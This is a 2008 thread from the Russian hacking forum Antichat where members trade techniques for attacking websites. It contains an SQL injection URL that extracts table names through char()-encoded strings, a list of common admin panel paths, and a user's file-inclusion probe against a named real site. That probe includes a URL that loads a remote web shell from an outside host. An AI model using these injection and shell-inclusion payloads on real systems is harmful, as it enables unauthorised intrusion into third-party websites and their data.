ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

30.03.2008, 15:29
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
удобнее хексить, но и charить можно, только не как в мускуле, а каждый сисмвол в отдельную функцию соединяя плюсам, в гет запросах %2B:
http://www.xxx.com/number.asp?id=45509+or+1=(select+top+1+table_name+ from+information_schema.columns+where+column_name= char(112)%2Bchar(97)%2Bchar(115) и т.д кстати ты перед -- скобку) пропустил
__________________
Карфаген должен быть разрушен...
|
|
|

30.03.2008, 16:25
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме: 2313429
Репутация:
728
|
|
2 Scipio
Хм, а хексить как ? А то через чар таким образом муторно =/
|
|
|

30.03.2008, 16:33
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
я обычно SIPT пользую так как стоит у меня, а вобще таких прог много:
http://forum.antichat.ru/thread24918.html
__________________
Карфаген должен быть разрушен...
|
|
|

30.03.2008, 19:31
|
|
Новичок
Регистрация: 08.12.2007
Сообщений: 21
Провел на форуме: 347718
Репутация:
36
|
|
Вопрос такой. Возможно ли определить наличие таблицы не используя union? То бишь я предполагаю, что в БД есть таблица, ну к примеру admin, можно ли определить есть такая таблица или нет?
Заранее мерси всем ответившим.
|
|
|

30.03.2008, 19:34
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме: 21768337
Репутация:
3486
|
|
Вопрос такой. Возможно ли определить наличие таблицы не используя union? То бишь я предполагаю, что в БД есть таблица, ну к примеру admin, можно ли определить есть такая таблица или нет?
Заранее мерси всем ответившим.
Нет
|
|
|

30.03.2008, 19:48
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме: 1050662
Репутация:
435
|
|
Как не заливая шелла найти админку, мож кто адреса админок самые такие популярные скинет ?
|
|
|

30.03.2008, 19:53
|
|
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме: 645316
Репутация:
327
|
|
www.ru/admin/
www.admin.site.ru/
www.ru/adm/
www.ru/administrator/
www.ru/pma/
www.ru/PhpMyAdmin/
....
|
|
|

30.03.2008, 20:51
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
Есть инклуд на сайте,с раскрытием пути.
http://rusxmms.sourceforge.net/index.php?page=home/groups/r/ru/rusxmms/htdocs/index.php
Warning: main(gaga.php): failed to open stream: No such file or directory in /home/groups/r/ru/rusxmms/htdocs/index.php on line 39
Warning: main(): Failed opening 'gaga.php' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/r/ru/rusxmms/htdocs/index.php on line 39
Вопрос: Как определить, статическое значение здесь или переменное? (нубский вопрос,но инклуды я ещё ниразу не юзил:РР). И ещё- можно ли её эксплуатировать(залить шелл на хостинг и перенаправить), если там не работает запрос HTTP вида
http://rusxmms.sourceforge.net/index.php?page=http://iadebilko.ru/padonag/shell.php
.Выдаёт Access Denied! - аналогично, если в файл передавать различные символы).
P.S. Пожалуйста, разъясните всё подробно - гайды читал,но многого не понял. Но это стопудо не глобальный инклудинг, ибо на GET- запросы ему тоже насрать - http://rusxmms.sourceforge.net/index.php?page=http://rambler.ru?
В этом случае бы просто расширение .xxx, в данном случае - php, отбросилось бы как гет параметр и я бы перешёл на рембелр ру.
Последний раз редактировалось Велемир; 30.03.2008 в 20:58..
|
|
|

30.03.2008, 20:52
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме: 8042357
Репутация:
3742
|
|
на сурсфордже url access disabled, то есть можно инклудить только локальные файлы
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|

30.03.2008, 20:59
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
Сообщение от blackybr
на сурсфордже url access disabled, то есть можно инклудить только локальные файлы
Эмм... а как ты узнал?:Р И,в таком случае, как здесь использовать локальный инклуд? (о.О).
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|